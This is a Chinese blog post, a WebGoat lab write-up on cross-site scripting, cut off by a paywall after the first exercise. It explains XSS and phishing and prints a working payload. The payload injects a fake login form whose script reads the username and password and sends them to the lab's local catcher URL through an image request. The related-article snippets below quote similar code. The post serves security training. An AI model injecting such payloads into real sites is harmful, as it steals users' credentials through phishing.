WebGoat实验之Cross-Site Scripting(XSS,跨站脚本攻击)- 2016.01.09

最新推荐文章于 2024-03-15 13:16:56 发布
VIP文章 最新推荐文章于 2024-03-15 13:16:56 发布
阅读量4.7k 收藏 4
点赞数 1
分类专栏: 网络安全之WebGoat 文章标签: WebGoat实验之Cross-Site XSS 跨站脚本攻击 Stroed XSS Phising XSS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baishileily/article/details/50488332
版权

        XSS(Cross-Site Scripting)跨站脚本攻击,由于 html 和 js 都是解释执行的,那么如果对用户的输入过滤不够严格或者说不严格处理,那么当用户也输入一些 html 或者 js 的并被浏览器再次加载的时候也是可以被浏览器解释执行的。那么对于一些博客、贴吧等存在用户输入、又存在游客查看评论的地方,做好用户输入的过滤就很有必要。那么 XSS 能干什么呢?不仅可以用来进行钓鱼攻击,还可以用来窃取用户的数据进而静默转移,传送给黑客,想想 html 和 js 能干什么他就能干什么,当然远不止这些,我们还可以注入一些服务器语言,使得服务器端执行的时候也发生未知的结果。

1.1 Phishing With XSS(钓鱼攻击)

如果一个未经验证的用户输入一个 HTTP 响应时, XSS 很有可能发生,利用它就可以进行钓鱼攻击,在一个页面内添加一个伪官方网页就可以骗取用户的账号和口令。注意这里强调的是在 HTTP 响应时攻击,而不是请求,要知道如果是请求的话,那么就相当于是自己黑自己,多没意思,可如果是响应的话就意味着,别人发送请求,而你响应他虚假的页面,这样就可以用来对其进行欺骗。

        首先,我们需要自己写一个页面,用于钓鱼,例如表 1 所示:

<script>

function hack(){

alert("Had this been a real attack... Your credentials were just stolen.UserName="+document.forms[1].user.value+"Password:"+document.forms[1].pass.value);

XSSImage = new Image();

XSSImage.src = "http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[1].user.value+"&password="+document.forms[1].pass.value;

}</script><form>

<br><br><HR><H3>This feature requires account login :</H3><br><br>

Enter UserName:<br><input type="text" id="user" name="user" /><br>

Enter Password:<br><input type="password" id="pass" name="pass" /><br>

<input type="button" id="login" name="login" value="login" οnclick="hack()" />

</form
最低0.47元/天 解锁文章
baishileily
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebGoat实验环境搭建 - 2016.01.01
baishileily的博客
01-01 1万+
Webgoat是OWASP组织研究出的一个专门进行web漏洞实验的应用品台,这个平台里包含了web中常见的各种漏洞,例如:跨站脚本攻击、sql注入、访问控制、隐藏字段、Cookie等;OWASP(Open Web Application Security Project)是一个非营利的组织,它的目的是帮助个人和企业来发现和使用可信赖的软件。 Wenscarab,Firefox,Chrome浏览器代理设置,Firefox代理设置,IE代理设置
WebGoat笔记】之四 --- Cross-Site Scripting (XSS)
weixin_30532369的博客
06-21 227
主要内容 保存,反射型Xss,CSRF及HttpOnly的特性 Phishing with XSS LAB: Cross Site Scripting Stage 1: Stored XSS. Stage 2: Block Stored XSS using Input Validation Stage 3: Stored XSS Revisited Stage 4: ...
再战WebGoat之代码审计
热门推荐
黑白的博客
09-27 1万+
再战webgoat之代码审计
【翻译+题解】WebGoat (A7) Cross Site Scripting (XSS) 跨站脚本
http://kk888.me/
03-15 1785
跨站脚本(通常也称为 XSS)是一种漏洞/缺陷,它允许将 html/脚本标记作为输入,未经编码或消毒就呈现在浏览器中。
WebGoat学习——跨站脚本攻击(Cross‐Site Scripting (XSS))
weixin_33690963的博客
06-21 487
跨站脚本攻击(Cross‐Site Scripting (XSS)) XSS(Cross Site Script)跨站脚本攻击。是指攻击者向被攻击Web 页面里插入恶意html代码,当用户浏览该页之时,嵌入其中的HTML代码会被执行,从而达到攻击的特殊目的。XSS和CSRF(Cross site request forgery)合称Web 杀手组合。黑客洞穿页面逻辑,使输入的内容被...
webgoat-standalone-7.1-SNAPSHOT-exec.jar
11-05
Prerequisites: Java VM 1.8 Open a command shell/window, browse to where you downloaded the easy run jar and type: java -jar webgoat-standalone-7.0.1-exec.jar [-p | --p <port>] [-a | --address <address>] Using the --help option will show the allowed command line arguments. 更多查看: https://github.com/WebGoat/WebGoat
Webgoat 笔记总结-Cross-site-scripting
weixin_34348805的博客
10-03 235
Cross-Site Scriptingxss) Phishing with XSS 网络钓鱼与xss 使用<script>alert('xss')</script> 测试 使用<script>function hack(){ alert("Had this been a real attack... Your creden...
WebGoat5.4 Cross-Site Scripting (XSS) 开发版本关卡 通关攻略
weixin_46356548的博客
12-27 3326
本人在学习WebGoat5.4时,发现有些题目需要在开发版本上完成,网上能找到的所谓的通关教程,都说这些题目做不了,经过尝试发现,其实是可以完成的,本篇将对这部分进行重点说明。
webgoat-Cross Site Scripting XSS 跨站脚本攻击
seanyang_的博客
11-28 736
本节课讲述了什么是XSS,并使用XSS执行那些非开发者本意的任务。
WebGoat (A7) Cross Site Scripting (XSS)
箭雨镜屋
03-21 2784
第2页 虽然这页好简单,但是强迫症不写就是不爽╮(╯-╰)╭ 这页问了个问题:WebGoat范围内多个页面cookie是否一样? 虽然很想直接yes,但还是走一遍流程吧 第1个页面,打开开发者工具(我用的chrome),在Console中输入document.cookie 发现cookie是"JSESSIONID=KDno80WzTKHgbTZZ2SP0-xQmVR7M5m5GTNGHHrBp" 第2个页面,打开开发者工具,在Console中输入alert(document.cookie
webgoat Phishing with XSS测试
09-21 525
“钓鱼测试” 目的就是创建一个表单,让受害者填写用户名和密码信息,然后会截取用户信息提交到webgoat上去。主要测试代码分为一下两部分: <form> <br>This feature requires account login:</br> Ente...
WebGoat笔记】--- Cross-Site Scripting(XSS)
weixin_33989058的博客
12-21 222
  目标: 伪造一个登陆界面,要求用户输入用户名和密码,将数据提交到http://localhost/WebGoat/capture/PROPERTY=yes&amp;ADD_CREDENTIALS_HERE   解决步骤: 首先:随意输入搜索内容,如:123. 打开源代码,检测是否有未关闭的标签。由于这是一个入门级的练手任务,代码漏洞百出,这一层就不用考虑了。 第二步:...
webgoat-server-8.0.0.M21.zip
07-18
webgoat-server-8.0.0.M21版本,测试网站漏洞等使用。
webgoat-server-8.0.0.M17
09-02
webgoat-server-8.0.0.M17
webgoat-container-7.0-SNAPSHOT-war-exec.jar
09-10
webgoat-container-7.0-SNAPSHOT-war-exec.jar。 用于进行网络安全中的渗透测试
webgoat-server-8.1.0.jar
04-04
webgoat-server-8.1.0
WebGoat实验之Authentication Flaws(认证缺陷) - 2016.01.09
baishileily的博客
01-09 2268
1.1 Password Strength(密码强度) 密码是账户安全的保障,是我们进行身份认证的凭证, 一旦密码泄露,这就意味着可能会给我们带来很大损失(黑客可以通过我们的账号发布一些虚假信息进而欺骗他人,甚至可以获取我们银行卡密码,进而危及我们的财产安全,还涉及了我们的隐私问题), 然而由于我们的习惯问题,我们常常在不同的站点使用相同的密码,甚至我们喜欢使用一些简单的密码,例如123456,
WebGoat实验之Buffer Overflow(缓冲区溢出)- 2016.01.08
baishileily的博客
01-08 2094
Buffer Overflow(缓冲区溢出),这已经是一个老生常谈的话题了,不仅在软件的制作上回出现这样的问题,其实在网络上也存在这样的问题。更准确的说应该是在有用户输入的地方都存在缓冲区溢出的可能性。那么什么是缓冲区溢出呢?百度是这么说的“计算机程序一般都会使用到一些内存,这些内存或是程序内部使用,或是存放用户的输入数据,这样的内存一般称作缓冲区。溢出是指盛放的东西超出容器容量而溢出来了,在计算
https://github.com/WebGoat/WebGoat
最新发布
04-20
WebGoat是一个用于学习Web应用程序安全的开源项目,它提供了一个实验环境,让开发人员和安全专家可以通过实践来了解和学习常见的Web应用程序漏洞和攻击技术。WebGoat是使用Java编写的,它模拟了一个真实的Web应用程序,并提供了一系列的教程和练习,帮助用户了解和掌握各种Web安全问题。 WebGoat的目标是通过实际操作来教育用户,让他们能够理解和防范常见的Web应用程序漏洞,如跨站点脚本(XSS)、SQL注入、会话管理问题等。它提供了一系列的课程和任务,用户可以按照指导逐步完成这些任务,并通过实际操作来学习和理解相关的安全知识。 WebGoat还提供了一个友好的用户界面,用户可以在浏览器中直接访问并进行实验。它还提供了详细的文档和解释,帮助用户理解每个任务的背景和目标,并提供了相应的解决方案和提示。 WebGoat是一个非常有用的工具,它可以帮助开发人员和安全专家提高对Web应用程序安全的认识和理解,并提供了一个安全的实验环境,让用户可以通过实践来学习和掌握相关的知识和技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值